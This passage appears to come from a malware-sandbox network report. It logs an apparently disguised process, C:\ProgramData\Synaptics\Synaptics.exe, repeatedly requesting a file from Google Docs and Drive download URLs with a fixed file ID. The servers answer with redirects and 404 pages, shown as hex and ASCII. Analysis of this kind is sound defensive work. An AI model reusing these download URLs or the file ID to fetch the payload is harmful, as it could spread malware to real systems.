                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 63 4f 6f 46 46 76 34 76 75 35 45 65 4f 34 31 79 7a 6c 68 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="ncOoFFv4vu5EeO41yzlhvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    137192.168.2.452232142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6lJz83018VXRdQ4a9G7hLKo0ke6jNf9mJWFPbl-fCZQ2OXkZ3E01CmUR-Iaa2WDqPT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:18 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-miKaqIPUpDgbQsEl3J7uIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:18 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 57 36 71 50 49 53 5f 62 37 33 51 33 57 72 47 4c 37 51 77 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="2W6qPIS_b73Q3WrGL7Qw6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:18 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    138192.168.2.452242142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    139192.168.2.452244142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    140192.168.2.452239142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    141192.168.2.452246142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    142192.168.2.452254142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:19 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TdlsF_uDO6xBODEIbi24QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    143192.168.2.452255142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:19 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dRVoDAivjzD1k5Zo3ZiEqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    144192.168.2.452263142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:20 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-OY8pAlq4TJux2oKgU-eY_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    145192.168.2.452262142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC68X0DEZuZGF9EP_tEwW6gZwICK5_DiVMVqVt8GVxRBqsrYM_Iu0l4fxfZ8qPNdjlIdiRCwXsQ
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:20 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-aAaa0g681WRQJ_ZVU40l2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:21 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 44 32 6d 31 5a 2d 33 47 46 41 61 39 76 69 43 51 2d 56 6a 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="ZD2m1Z-3GFAa9viCQ-VjQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:21 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    146192.168.2.452265142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
